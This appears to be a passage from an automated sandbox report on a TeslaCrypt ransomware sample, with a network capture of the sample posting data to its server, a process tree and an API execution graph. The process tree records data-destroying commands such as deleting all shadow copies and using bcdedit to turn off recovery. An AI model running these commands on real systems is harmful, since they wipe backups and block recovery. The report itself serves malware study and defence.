                  Data Ascii: IiOiJ3cy0wNC5tdWMucGNyZXcuaW8iLCJydCI6IjAuMDExODk4OTk0NDQ2IiwiZXh0SXAiOiIxODUuNTMuMTc4LjU0IiwicXVpY2tUaWVyMiI6ZmFsc2UsInNzbCI6ZmFsc2UsInNzbEhhc0NlcnQiOm51bGwsIjUxZGVncmVlcyI6eyJIYXJkd2FyZUZhbWlseSI6IldpbmRvd3MgOCBUb3VjaCIsIkhhcmR3YXJlTW9kZWwiO


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  1192.168.2.64971052.60.87.16380C:\Users\user\AppData\Roaming\mllvvvh.exe
                  TimestampkBytes transferredDirectionData
                  Mar 24, 2021 18:31:33.363377094 CET321OUTPOST /tmp/mzsys.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko
                  Host: iicsdrd.com
                  Content-Length: 645
                  Cache-Control: no-cache
                  Data Raw: 64 61 74 61 3d 45 44 41 42 46 42 39 35 32 32 41 46 36 33 45 43 41 43 39 43 42 36 43 44 44 36 42 35 30 34 36 36 32 35 42 35 43 36 34 33 41 38 30 35 33 44 30 34 33 39 37 44 33 37 46 33 44 44 44 34 30 44 34 30 36 42 36 34 37 44 31 41 34 32 30 43 31 36 34 42 32 42 44 30 39 35 44 35 31 43 43 30 38 44 36 43 30 44 42 34 36 38 35 42 36 35 34 43 31 44 46 32 36 42 45 43 45 36 34 41 43 33 36 39 34 45 36 42 45 38 45 35 35 42 42 41 42 33 39 37 33 41 33 41 33 41 43 37 38 30 41 32 45 31 42 32 30 46 45 31 43 44 33 43 33 35 39 42 30 38 39 34 43 36 41 46 37 31 45 44 38 45 42 33 38 38 36 34 41 41 39 42 42 42 45 43 39 38 43 45 44 31 42 43 42 42 41 39 39 35 38 41 33 37 43 42 35 30 43 36 36 39 35 42 33 33 42 42 44 38 45 43 39 38 33 41 38 32 35 45 32 32 44 46 45 44 46 38 36 30 45 37 36 31 36 30 41 44 41 35 35 37 44 43 34 43 33 44 37 38 32 36 35 37 39 39 37 31 38 32 31 43 44 46 38 30 38 44 41 38 30 34 41 41 43 45 46 34 42 45 45 34 33 38 46 39 30 36 44 31 33 31 31 45 34 45 45 39 45 46 37 37 33 33 33 38 45 38 42 44 44 44 42 39 46 34 45 46 39 37 38 45 30 34 42 41 39 31 41 38 35 42 44 45 35 33 32 31 39 41 38 43 34 43 36 37 34 32 39 46 30 43 33 46 32 31 45 36 43 41 33 36 44 36 45 42 32 34 32 39 38 42 37 45 39 35 38 30 45 33 41 45 34 33 36 38 35 41 33 43 44 44 42 32 32 42 30 42 35 32 42 32 37 44 45 30 42 36 46 43 44 30 35 36 43 33 33 35 31 30 34 42 45 32 44 41 41 37 45 32 46 42 43 41 42 41 41 30 44 46 37 39 37 36 37 30 37 35 31 42 30 46 36 41 35 35 45 31 30 38 30 32 37 32 32 44 46 43 43 42 31 43 46 43 32 34 46 31 37 34 42 38 46 35 33 39 30 36 46 35 42 46 31 41 43 30 38 44 41 37 36 33 36 43 35 34 30 37 33 31 44 34 36 35 44 30 43 42 36 44 39 37 45 38 39 31 43 39 31 39 32 43 39 39 41 41 44 32 46 39 30 39 32 33 44 38 35 34 38 41 39 34 36 43 35 42 36 45 41 43 46 37 41 31 46 41 45 45 41 44 45 32 45 36 37 41 44 35 45 39 35 39 33 43 34 36 34 37 30 41 38 37 39 44 34 36 31 32 34 30 31 30 46 41 42 37 44 32 42 42 34 37 30 43 37 37 39 43 36 39
                  Data Ascii: data=EDABFB9522AF63ECAC9CB6CDD6B5046625B5C643A8053D04397D37F3DDD40D406B647D1A420C164B2BD095D51CC08D6C0DB4685B654C1DF26BECE64AC3694E6BE8E55BBAB3973A3A3AC780A2E1B20FE1CD3C359B0894C6AF71ED8EB38864AA9BBBEC98CED1BCBBA9958A37CB50C6695B33BBD8EC983A825E22DFEDF860E76160ADA557DC4C3D7826579971821CDF808DA804AACEF4BEE438F906D1311E4EE9EF773338E8BDDDB9F4EF978E04BA91A85BDE53219A8C4C67429F0C3F21E6CA36D6EB24298B7E9580E3AE43685A3CDDB22B0B52B27DE0B6FCD056C335104BE2DAA7E2FBCABAA0DF797670751B0F6A55E10802722DFCCB1CFC24F174B8F53906F5BF1AC08DA7636C540731D465D0CB6D97E891C9192C99AAD2F90923D8548A946C5B6EACF7A1FAEEADE2E67AD5E9593C46470A879D46124010FAB7D2BB470C779C69
                  Mar 24, 2021 18:31:33.469351053 CET322INHTTP/1.1 404 Not Found
                  Server: nginx
                  Date: Wed, 24 Mar 2021 17:31:33 GMT
                  Content-Type: text/html
                  Content-Length: 162
                  Connection: keep-alive
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                  Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                  Code Manipulations

                  Statistics

                  CPU Usage

                  Click to jump to process

                  Memory Usage

                  Click to jump to process

                  High Level Behavior Distribution

                  Click to dive into process behavior distribution

                  Behavior

                  Click to jump to process

                  System Behavior

                  General

                  Start time:18:30:52
                  Start date:24/03/2021
                  Path:C:\Users\user\Desktop\safecrypt.exe
                  Wow64 process (32bit):true
                  Commandline:'C:\Users\user\Desktop\safecrypt.exe'
                  Imagebase:0x400000
                  File size:495616 bytes
                  MD5 hash:4A1D88603B1007825A9C6B36D1E5DE44
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:low

                  General

                  Start time:18:30:53
                  Start date:24/03/2021
                  Path:C:\Users\user\Desktop\safecrypt.exe
                  Wow64 process (32bit):true
                  Commandline:'C:\Users\user\Desktop\safecrypt.exe'
                  Imagebase:0x400000
                  File size:495616 bytes
                  MD5 hash:4A1D88603B1007825A9C6B36D1E5DE44
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_TeslaCrypt, Description: Yara detected TeslaCrypt Ransomware, Source: 00000001.00000001.325563436.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                  • Rule: Win32_Ransomware_Teslacrypt, Description: unknown, Source: 00000001.00000001.325563436.0000000000400000.00000040.00020000.sdmp, Author: ReversingLabs
                  • Rule: JoeSecurity_TeslaCrypt, Description: Yara detected TeslaCrypt Ransomware, Source: 00000001.00000002.328930565.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                  • Rule: Win32_Ransomware_Teslacrypt, Description: unknown, Source: 00000001.00000002.328930565.0000000000400000.00000040.00000001.sdmp, Author: ReversingLabs
                  Reputation:low

                  General

                  Start time:18:30:54
                  Start date:24/03/2021
                  Path:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  Imagebase:0x400000
                  File size:495616 bytes
                  MD5 hash:4A1D88603B1007825A9C6B36D1E5DE44
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Antivirus matches:
                  • Detection: 74%, Metadefender, Browse
                  • Detection: 96%, ReversingLabs
                  Reputation:low

                  General

                  Start time:18:30:55
                  Start date:24/03/2021
                  Path:C:\Windows\SysWOW64\cmd.exe
                  Wow64 process (32bit):true
                  Commandline:'C:\Windows\system32\cmd.exe' /c DEL C:\Users\user\Desktop\SAFECR~1.EXE
                  Imagebase:0x2a0000
                  File size:232960 bytes
                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  General

                  Start time:18:30:55
                  Start date:24/03/2021
                  Path:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  Imagebase:0x400000
                  File size:495616 bytes
                  MD5 hash:4A1D88603B1007825A9C6B36D1E5DE44
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_TeslaCrypt, Description: Yara detected TeslaCrypt Ransomware, Source: 00000004.00000001.330553837.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                  • Rule: Win32_Ransomware_Teslacrypt, Description: unknown, Source: 00000004.00000001.330553837.0000000000400000.00000040.00020000.sdmp, Author: ReversingLabs
                  Reputation:low

                  General

                  Start time:18:30:55
                  Start date:24/03/2021
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff61de10000
                  File size:625664 bytes
                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  General

                  Start time:18:30:57
                  Start date:24/03/2021
                  Path:C:\Windows\System32\bcdedit.exe
                  Wow64 process (32bit):false
                  Commandline:bcdedit.exe /set {current} bootems off
                  Imagebase:0x7ff6d74d0000
                  File size:461824 bytes
                  MD5 hash:6E05CD5195FDB8B6C68FC90074817293
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:moderate

                  General

                  Start time:18:30:57
                  Start date:24/03/2021
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff61de10000
                  File size:625664 bytes
                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  General

                  Start time:18:30:58
                  Start date:24/03/2021
                  Path:C:\Windows\System32\vssadmin.exe
                  Wow64 process (32bit):false
                  Commandline:'C:\Windows\System32\vssadmin.exe' delete shadows /all /Quiet
                  Imagebase:0x7ff77f280000
                  File size:145920 bytes
                  MD5 hash:47D51216EF45075B5F7EAA117CC70E40
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:moderate

                  General

                  Start time:18:30:58
                  Start date:24/03/2021
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff61de10000
                  File size:625664 bytes
                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  General

                  Start time:18:30:59
                  Start date:24/03/2021
                  Path:C:\Windows\System32\bcdedit.exe
                  Wow64 process (32bit):false
                  Commandline:bcdedit.exe /set {current} advancedoptions off
                  Imagebase:0x7ff6d74d0000
                  File size:461824 bytes
                  MD5 hash:6E05CD5195FDB8B6C68FC90074817293
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:moderate

                  General

                  Start time:18:30:59
                  Start date:24/03/2021
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff61de10000
                  File size:625664 bytes
                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  General

                  Start time:18:31:01
                  Start date:24/03/2021
                  Path:C:\Windows\System32\bcdedit.exe
                  Wow64 process (32bit):false
                  Commandline:bcdedit.exe /set {current} optionsedit off
                  Imagebase:0x7ff6d74d0000
                  File size:461824 bytes
                  MD5 hash:6E05CD5195FDB8B6C68FC90074817293
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:moderate

                  General

                  Start time:18:31:02
                  Start date:24/03/2021
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff61de10000
                  File size:625664 bytes
                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  General

                  Start time:18:31:04
                  Start date:24/03/2021
                  Path:C:\Windows\System32\bcdedit.exe
                  Wow64 process (32bit):false
                  Commandline:bcdedit.exe /set {current} bootstatuspolicy IgnoreAllFailures
                  Imagebase:0x7ff6d74d0000
                  File size:461824 bytes
                  MD5 hash:6E05CD5195FDB8B6C68FC90074817293
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:moderate

                  General

                  Start time:18:31:04
                  Start date:24/03/2021
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff61de10000
                  File size:625664 bytes
                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  General

                  Start time:18:31:05
                  Start date:24/03/2021
                  Path:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  Wow64 process (32bit):true
                  Commandline:'C:\Users\user\AppData\Roaming\mllvvvh.exe'
                  Imagebase:0x400000
                  File size:495616 bytes
                  MD5 hash:4A1D88603B1007825A9C6B36D1E5DE44
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language

                  General

                  Start time:18:31:06
                  Start date:24/03/2021
                  Path:C:\Windows\System32\bcdedit.exe
                  Wow64 process (32bit):false
                  Commandline:bcdedit.exe /set {current} recoveryenabled off
                  Imagebase:0x7ff6d74d0000
                  File size:461824 bytes
                  MD5 hash:6E05CD5195FDB8B6C68FC90074817293
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language

                  General

                  Start time:18:31:06
                  Start date:24/03/2021
                  Path:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  Wow64 process (32bit):true
                  Commandline:'C:\Users\user\AppData\Roaming\mllvvvh.exe'
                  Imagebase:0x400000
                  File size:495616 bytes
                  MD5 hash:4A1D88603B1007825A9C6B36D1E5DE44
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_TeslaCrypt, Description: Yara detected TeslaCrypt Ransomware, Source: 00000014.00000002.360977182.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                  • Rule: Win32_Ransomware_Teslacrypt, Description: unknown, Source: 00000014.00000002.360977182.0000000000400000.00000040.00000001.sdmp, Author: ReversingLabs
                  • Rule: Win32_Ransomware_Teslacrypt, Description: unknown, Source: 00000014.00000001.355902917.0000000000400000.00000040.00020000.sdmp, Author: ReversingLabs

                  General

                  Start time:18:31:06
                  Start date:24/03/2021
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff61de10000
                  File size:625664 bytes
                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language

                  General

                  Start time:18:31:13
                  Start date:24/03/2021
                  Path:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  Wow64 process (32bit):true
                  Commandline:'C:\Users\user\AppData\Roaming\mllvvvh.exe'
                  Imagebase:0x400000
                  File size:495616 bytes
                  MD5 hash:4A1D88603B1007825A9C6B36D1E5DE44
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language

                  General

                  Start time:18:31:14
                  Start date:24/03/2021
                  Path:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  Wow64 process (32bit):true
                  Commandline:'C:\Users\user\AppData\Roaming\mllvvvh.exe'
                  Imagebase:0x400000
                  File size:495616 bytes
                  MD5 hash:4A1D88603B1007825A9C6B36D1E5DE44
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_TeslaCrypt, Description: Yara detected TeslaCrypt Ransomware, Source: 00000017.00000001.371854756.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                  • Rule: Win32_Ransomware_Teslacrypt, Description: unknown, Source: 00000017.00000001.371854756.0000000000400000.00000040.00020000.sdmp, Author: ReversingLabs
                  • Rule: JoeSecurity_TeslaCrypt, Description: Yara detected TeslaCrypt Ransomware, Source: 00000017.00000002.373053534.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                  • Rule: Win32_Ransomware_Teslacrypt, Description: unknown, Source: 00000017.00000002.373053534.0000000000400000.00000040.00000001.sdmp, Author: ReversingLabs

                  General

                  Start time:18:31:21
                  Start date:24/03/2021
                  Path:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  Wow64 process (32bit):true
                  Commandline:'C:\Users\user\AppData\Roaming\mllvvvh.exe'
                  Imagebase:0x400000
                  File size:495616 bytes
                  MD5 hash:4A1D88603B1007825A9C6B36D1E5DE44
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language

                  General

                  Start time:18:31:22
                  Start date:24/03/2021
                  Path:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  Wow64 process (32bit):true
                  Commandline:'C:\Users\user\AppData\Roaming\mllvvvh.exe'
                  Imagebase:0x400000
                  File size:495616 bytes
                  MD5 hash:4A1D88603B1007825A9C6B36D1E5DE44
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: Win32_Ransomware_Teslacrypt, Description: unknown, Source: 00000019.00000001.389132336.0000000000400000.00000040.00020000.sdmp, Author: ReversingLabs
                  • Rule: JoeSecurity_TeslaCrypt, Description: Yara detected TeslaCrypt Ransomware, Source: 00000019.00000002.390167710.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                  • Rule: Win32_Ransomware_Teslacrypt, Description: unknown, Source: 00000019.00000002.390167710.0000000000400000.00000040.00000001.sdmp, Author: ReversingLabs

                  Disassembly

                  Code Analysis

                  Reset < >

                    Execution Graph

                    Execution Coverage:6.2%
                    Dynamic/Decrypted Code Coverage:96.6%
                    Signature Coverage:48%
                    Total number of Nodes:296
                    Total number of Limit Nodes:15

                    Graph

                    execution_graph 24025 441a46 __set_app_type __p__fmode __p__commode 24026 441ab5 24025->24026 24027 441abd __setusermatherr 24026->24027 24028 441ac9 24026->24028 24027->24028 24037 441bb6 _controlfp 24028->24037 24030 441ace _initterm __getmainargs _initterm 24031 441b22 GetStartupInfoA 24030->24031 24033 441b56 GetModuleHandleA 24031->24033 24038 441e24 #1576 24033->24038 24036 441b7a ldiv _XcptFilter 24037->24030 24038->24036 24437 268116b 44 API calls 24042 268136e 24043 2681370 24042->24043 24044 268137a ReadFile 24043->24044 24046 268138e 24044->24046 24045 2681393 24046->24045 24047 2681417 FindCloseChangeNotification 24046->24047 24048 2681425 24047->24048 24049 2681459 24048->24049 24052 26815c4 39 API calls 24049->24052 24051 26815b7 24052->24051 24055 2680467 RegOpenKeyExA RegOpenKeyExA 24443 268177b 28 API calls 24058 2680948 CoInitialize CoInitialize CoInitialize 24060 2680a42 CoInitialize 24065 268055a 24067 268051c 24065->24067 24070 268055e 24065->24070 24066 2680554 24067->24066 24068 268052e RegOpenKeyExA 24067->24068 24068->24067 24069 26805ea 24068->24069 24449 2680d5b 49 API calls 24381 268165f 38 API calls 24453 2681b29 6 API calls 24384 2680e2b 48 API calls 24387 2681423 39 API calls 24457 2681327 41 API calls 24167 2681635 24168 2681637 24167->24168 24169 2681641 VirtualAlloc 24168->24169 24170 268164f 24169->24170 24200 26816a6 24170->24200 24172 26816a2 24173 26817f2 24228 2681828 24173->24228 24174 2681692 24174->24172 24174->24173 24175 268174a 24174->24175 24315 268176d 28 API calls 24175->24315 24178 2681826 24179 268181c 24179->24178 24180 26818a5 VirtualFree 24179->24180 24249 26818d5 24180->24249 24182 26818c7 24267 2681983 24182->24267 24183 2681761 24183->24173 24185 2681975 24283 2681a22 24185->24283 24187 2681a12 24297 2681b1b 24187->24297 24189 2681b98 CreateProcessW 24191 2681bc6 24189->24191 24190 2681b0c 24190->24189 24192 2681c6f NtUnmapViewOfSection 24191->24192 24193 2681c90 24192->24193 24309 2681cb0 24193->24309 24195 2681ca1 24196 2681d2d VirtualAllocEx 24195->24196 24198 2681d3a 24196->24198 24197 2681dfd WriteProcessMemory 24199 2681e0e 24197->24199 24198->24197 24201 26816b6 24200->24201 24202 26817f2 24201->24202 24203 268174a 24201->24203 24204 2681828 23 API calls 24202->24204 24316 268176d 28 API calls 24203->24316 24207 268181c 24204->24207 24206 2681826 24207->24206 24208 26818a5 VirtualFree 24207->24208 24209 26818d5 18 API calls 24208->24209 24210 26818c7 24209->24210 24212 2681983 14 API calls 24210->24212 24211 2681761 24211->24202 24213 2681975 24212->24213 24214 2681a22 10 API calls 24213->24214 24215 2681a12 24214->24215 24216 2681b1b 6 API calls 24215->24216 24218 2681b0c 24216->24218 24217 2681b98 CreateProcessW 24219 2681bc6 24217->24219 24218->24217 24220 2681c6f NtUnmapViewOfSection 24219->24220 24221 2681c90 24220->24221 24222 2681cb0 2 API calls 24221->24222 24223 2681ca1 24222->24223 24224 2681d2d VirtualAllocEx 24223->24224 24226 2681d3a 24224->24226 24225 2681dfd WriteProcessMemory 24227 2681e0e 24225->24227 24226->24225 24227->24174 24229 2681838 24228->24229 24230 26818a5 VirtualFree 24229->24230 24231 26818d5 18 API calls 24230->24231 24232 26818c7 24231->24232 24233 2681983 14 API calls 24232->24233 24234 2681975 24233->24234 24235 2681a22 10 API calls 24234->24235 24236 2681a12 24235->24236 24237 2681b1b 6 API calls 24236->24237 24239 2681b0c 24237->24239 24238 2681b98 CreateProcessW 24240 2681bc6 24238->24240 24239->24238 24241 2681c6f NtUnmapViewOfSection 24240->24241 24242 2681c90 24241->24242 24243 2681cb0 2 API calls 24242->24243 24244 2681ca1 24243->24244 24245 2681d2d VirtualAllocEx 24244->24245 24247 2681d3a 24245->24247 24246 2681dfd WriteProcessMemory 24248 2681e0e 24246->24248 24247->24246 24248->24179 24250 26818e5 24249->24250 24251 2681983 14 API calls 24250->24251 24252 2681975 24251->24252 24253 2681a22 10 API calls 24252->24253 24254 2681a12 24253->24254 24255 2681b1b 6 API calls 24254->24255 24257 2681b0c 24255->24257 24256 2681b98 CreateProcessW 24258 2681bc6 24256->24258 24257->24256 24259 2681c6f NtUnmapViewOfSection 24258->24259 24260 2681c90 24259->24260 24261 2681cb0 2 API calls 24260->24261 24262 2681ca1 24261->24262 24263 2681d2d VirtualAllocEx 24262->24263 24265 2681d3a 24263->24265 24264 2681dfd WriteProcessMemory 24266 2681e0e 24264->24266 24265->24264 24266->24182 24268 2681993 24267->24268 24269 2681a22 10 API calls 24268->24269 24270 2681a12 24269->24270 24271 2681b1b 6 API calls 24270->24271 24273 2681b0c 24271->24273 24272 2681b98 CreateProcessW 24274 2681bc6 24272->24274 24273->24272 24275 2681c6f NtUnmapViewOfSection 24274->24275 24276 2681c90 24275->24276 24277 2681cb0 2 API calls 24276->24277 24278 2681ca1 24277->24278 24279 2681d2d VirtualAllocEx 24278->24279 24281 2681d3a 24279->24281 24280 2681dfd WriteProcessMemory 24282 2681e0e 24280->24282 24281->24280 24282->24185 24284 2681a32 24283->24284 24285 2681b1b 6 API calls 24284->24285 24287 2681b0c 24285->24287 24286 2681b98 CreateProcessW 24288 2681bc6 24286->24288 24287->24286 24289 2681c6f NtUnmapViewOfSection 24288->24289 24290 2681c90 24289->24290 24291 2681cb0 2 API calls 24290->24291 24292 2681ca1 24291->24292 24293 2681d2d VirtualAllocEx 24292->24293 24295 2681d3a 24293->24295 24294 2681dfd WriteProcessMemory 24296 2681e0e 24294->24296 24295->24294 24296->24187 24298 2681b2b 24297->24298 24299 2681b98 CreateProcessW 24298->24299 24300 2681bc6 24299->24300 24301 2681c6f NtUnmapViewOfSection 24300->24301 24302 2681c90 24301->24302 24303 2681cb0 2 API calls 24302->24303 24304 2681ca1 24303->24304 24305 2681d2d VirtualAllocEx 24304->24305 24307 2681d3a 24305->24307 24306 2681dfd WriteProcessMemory 24308 2681e0e 24306->24308 24307->24306 24308->24190 24310 2681cc0 24309->24310 24311 2681d2d VirtualAllocEx 24310->24311 24313 2681d3a 24311->24313 24312 2681dfd WriteProcessMemory 24314 2681e0e 24312->24314 24313->24312 24314->24195 24315->24183 24316->24211 24392 2681836 23 API calls 24462 2681d37 WriteProcessMemory 24318 2682509 24319 268250b 24318->24319 24320 2682515 ExitProcess 24319->24320 24463 2680f0c 47 API calls 24397 2681c00 NtUnmapViewOfSection VirtualAllocEx WriteProcessMemory VirtualAllocEx WriteProcessMemory 24398 2681219 44 API calls 24040 26803ec RegOpenKeyExA RegOpenKeyExA RegOpenKeyExA 24403 26818e3 18 API calls 24479 2680fc8 46 API calls 24485 26815d2 39 API calls 24076 26813a8 40 API calls 24490 26819ad 14 API calls 24077 26804ae RegOpenKeyExA 24421 2680caf 51 API calls 24078 26812a2 24079 26812a4 24078->24079 24080 26812ae VirtualAlloc 24079->24080 24081 26812d7 24080->24081 24092 26812fd 24081->24092 24083 26812f4 24084 268137a ReadFile 24083->24084 24086 268138e 24084->24086 24085 2681393 24086->24085 24087 2681417 FindCloseChangeNotification 24086->24087 24088 2681425 24087->24088 24089 2681459 24088->24089 24090 26815c4 39 API calls 24089->24090 24091 26815b7 24090->24091 24093 268130d 24092->24093 24094 268137a ReadFile 24093->24094 24096 268138e 24094->24096 24095 2681393 24096->24095 24097 2681417 FindCloseChangeNotification 24096->24097 24098 2681425 24097->24098 24099 2681459 24098->24099 24102 26815c4 39 API calls 24099->24102 24101 26815b7 24102->24101 24103 2680aa5 24104 2680aa7 24103->24104 24105 2680ab1 CoInitialize 24104->24105 24106 2680ac3 24105->24106 24107 26809a6 CoInitialize CoInitialize 24108 2680dbe 24109 2680dc0 24108->24109 24110 2680dca Sleep 24109->24110 24111 2680ddd 24110->24111 24112 2680e8d 24111->24112 24127 2680efe 24111->24127 24114 2680eed 24141 2680fba 24114->24141 24116 2680fa7 24153 2681095 24116->24153 24118 2681112 CreateFileW 24120 268112c 24118->24120 24121 2681120 24118->24121 24119 2681089 24119->24118 24163 268115d 44 API calls 24120->24163 24128 2680f0e 24127->24128 24129 2680fba 46 API calls 24128->24129 24130 2680fa7 24129->24130 24131 2681095 45 API calls 24130->24131 24133 2681089 24131->24133 24132 2681112 CreateFileW 24134 268112c 24132->24134 24135 2681120 24132->24135 24133->24132 24164 268115d 44 API calls 24134->24164 24135->24114 24142 2680fca 24141->24142 24143 2681095 45 API calls 24142->24143 24145 2681089 24143->24145 24144 2681112 CreateFileW 24146 268112c 24144->24146 24147 2681120 24144->24147 24145->24144 24165 268115d 44 API calls 24146->24165 24147->24116 24154 26810a5 24153->24154 24155 2681112 CreateFileW 24154->24155 24156 268112c 24155->24156 24157 2681120 24155->24157 24166 268115d 44 API calls 24156->24166 24157->24119 24425 2681cbe VirtualAllocEx WriteProcessMemory 24430 2681082 45 API calls 24431 2681686 33 API calls 24432 2682498 ExitProcess 24326 2681899 24327 268189b 24326->24327 24328 26818a5 VirtualFree 24327->24328 24329 26818d5 18 API calls 24328->24329 24330 26818c7 24329->24330 24331 2681983 14 API calls 24330->24331 24332 2681975 24331->24332 24333 2681a22 10 API calls 24332->24333 24334 2681a12 24333->24334 24335 2681b1b 6 API calls 24334->24335 24337 2681b0c 24335->24337 24336 2681b98 CreateProcessW 24338 2681bc6 24336->24338 24337->24336 24339 2681c6f NtUnmapViewOfSection 24338->24339 24340 2681c90 24339->24340 24341 2681cb0 2 API calls 24340->24341 24342 2681ca1 24341->24342 24343 2681d2d VirtualAllocEx 24342->24343 24345 2681d3a 24343->24345 24344 2681dfd WriteProcessMemory 24346 2681e0e 24344->24346 24345->24344 24500 2681991 10 API calls 24350 2680e95 24351 2680e9c 24350->24351 24352 2680efe 47 API calls 24351->24352 24353 2680eed 24352->24353 24354 2680fba 46 API calls 24353->24354 24355 2680fa7 24354->24355 24356 2681095 45 API calls 24355->24356 24358 2681089 24356->24358 24357 2681112 CreateFileW 24359 268112c 24357->24359 24360 2681120 24357->24360 24358->24357 24366 268115d 44 API calls 24359->24366

                    Executed Functions

                    Control-flow Graph

                    • Executed
                    • Not Executed
